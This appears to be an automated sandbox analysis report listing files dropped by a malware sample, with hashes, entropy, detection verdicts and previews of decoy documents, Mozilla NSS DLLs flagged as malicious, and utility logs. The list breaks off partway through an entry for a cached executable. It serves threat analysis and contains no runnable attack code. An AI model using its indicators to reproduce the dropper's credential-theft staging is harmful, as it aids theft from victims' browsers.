JNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse Filename: w3WOJ1ohgD.exe, Detection: malicious, Browse Filename: R0hb7jyBcv.exe, Detection: malicious, Browse Filename: g77dRQ1Csm.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: mJVVW85CnW.exe, Detection: malicious, Browse Filename: Vk2yYa9dHl.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\iolo technologies\logs\bootstrap.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	331
Entropy (8bit):	5.173631620035464
Encrypted:	false
SSDEEP:	6:BMKLt+MpttaAgrCYl7MpimLIYvgBtXSMp/RHB1JCTK7MpaIhI0XY4eA:f5aXCYdmkYvgLX/T/rIh73
MD5:	9FFB7CCABFDAEF3ACF336D581EE6938E
SHA1:	7B1F31D07A1AC7887E10D419991358E947B0E514
SHA-256:	8DB58ECB508BF13CFD5CCD3E76363C191331A5862513D8C80B59A7B8AA0ABA11
SHA-512:	5DCE9E76A21069E4777EF388EB7260622FE4FE471B2134C198A754400DFF71C0EAC1BE7EB09A595885CA1AA247345AB751F372322014674D45DA26BE28A45E2D
Malicious:	false
Preview:	Bootstrap LogFile..-----------------..[26/04/2024 10:27:48]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[26/04/2024 10:27:48]: This Brand IOLODEFAULT Not Detected As Installed..[26/04/2024 10:27:48]: No Supported Products Were Detected On This System..[26/04/2024 10:28:20]: Telemetry Data Sent..

C:\ProgramData\iolo\logs\WSComm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.216968566252454
Encrypted:	false
SSDEEP:	6:q0MoITs0TCfk3VotGjZb34L0MoW0Qilo4MoCFCs0TCfk3VotGjZb34L0MoCFmQit:1KHTXVotgOL0wZiTM6TXVotgOL0Mvit
MD5:	718E53189AD1F98263A7D10007D556E5
SHA1:	289AB4FB2C08B60EB934030639EE453D9EC075C2
SHA-256:	2E364E1E494E2274FE5F30B76411931E964D2B19C9638175AD63131CE88FF362
SHA-512:	78D5F2C63D064612C822582533D61CEACF74657092E72B37D9BE048FF561DE75B755A48953B0E962D77BF2723E0428E70D726707AFC0FDCFBA2C1AAF2D706243
Malicious:	false
Preview:	[04/26/24 10:27:13] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/26/24 10:27:14] IsValidCommunication : Result := True...[04/26/24 10:27:32] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/26/24 10:27:32] IsValidCommunication : Result := True...

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\02b7d1436f6e86786e74c7f14b0eeb043810a2ded0b85707d2c8e2ec408053fe\lqjrjxav.xxo

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5mc.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
